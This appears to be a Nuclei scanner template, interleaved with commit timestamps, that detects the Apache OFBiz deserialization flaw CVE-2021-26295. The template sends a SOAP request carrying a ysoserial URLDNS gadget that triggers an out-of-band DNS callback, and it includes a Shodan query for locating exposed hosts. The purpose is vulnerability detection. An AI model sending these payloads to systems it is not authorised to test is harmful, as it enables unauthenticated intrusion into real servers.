2021-03-23 16:00:15 +00:00
id : CVE-2021-26295
2022-04-22 10:38:41 +00:00
2021-03-23 16:00:15 +00:00
info :
2022-05-18 20:58:07 +00:00
name : Apache OFBiz <17.12.06 - Arbitrary Code Execution
2021-03-23 16:00:15 +00:00
author : madrobot
severity : critical
2022-05-17 20:33:23 +00:00
description : |
Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.
2021-08-18 11:37:49 +00:00
reference :
2021-03-25 10:08:15 +00:00
- https://github.com/yumusb/CVE-2021-26295-POC
2022-05-17 20:33:23 +00:00
- https://packetstormsecurity.com/files/162104/Apache-OFBiz-SOAP-Java-Deserialization.html
- https://github.com/zhzyker/exphub/tree/master/ofbiz
2022-05-17 20:46:49 +00:00
- https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
2022-05-18 20:58:07 +00:00
- https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
- https://nvd.nist.gov/vuln/detail/CVE-2021-26295
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-26295
cwe-id : CWE-502
2021-09-16 15:54:33 +00:00
metadata :
2022-05-17 20:33:23 +00:00
shodan-query : OFBiz.Visitor=
2022-05-17 20:46:49 +00:00
verified : "true"
ysoserial-payload : java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex
2022-05-17 20:33:23 +00:00
tags : cve,cve2021,apache,ofbiz,deserialization,rce
2021-03-24 07:30:26 +00:00
2021-03-23 16:00:15 +00:00
requests :
- raw :
- |
POST /webtools/control/SOAPService HTTP/1.1
Host : {{Hostname}}
Content-Type : application/xml
2022-05-17 20:33:23 +00:00
<?xml version='1.0' encoding='UTF-8'?>
2021-09-08 12:17:19 +00:00
<soapenv:Envelope
2022-05-17 20:33:23 +00:00
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
2021-09-08 12:17:19 +00:00
<soapenv:Body>
2022-05-17 20:33:23 +00:00
<ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/">
<ns1:cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</ns1:cus-obj>
</ns1:clearAllEntityCaches>
2021-09-08 12:17:19 +00:00
</soapenv:Body>
2021-03-23 16:00:15 +00:00
</soapenv:Envelope>
matchers-condition : and
matchers :
- type : word
2022-05-17 20:33:23 +00:00
part : interactsh_protocol
2021-03-23 16:00:15 +00:00
words :
2022-05-17 20:33:23 +00:00
- "dns"
2021-09-08 12:17:19 +00:00
2021-03-23 16:00:15 +00:00
- type : word
2022-05-17 20:33:23 +00:00
part : body
2021-03-23 16:00:15 +00:00
words :
- "errorMessage"
2022-05-18 20:58:07 +00:00
condition : and
2022-05-17 20:33:23 +00:00
- type : word
part : header
words :
2022-05-18 20:58:07 +00:00
- "OFBiz.Visitor="
# Enhanced by mp on 2022/05/17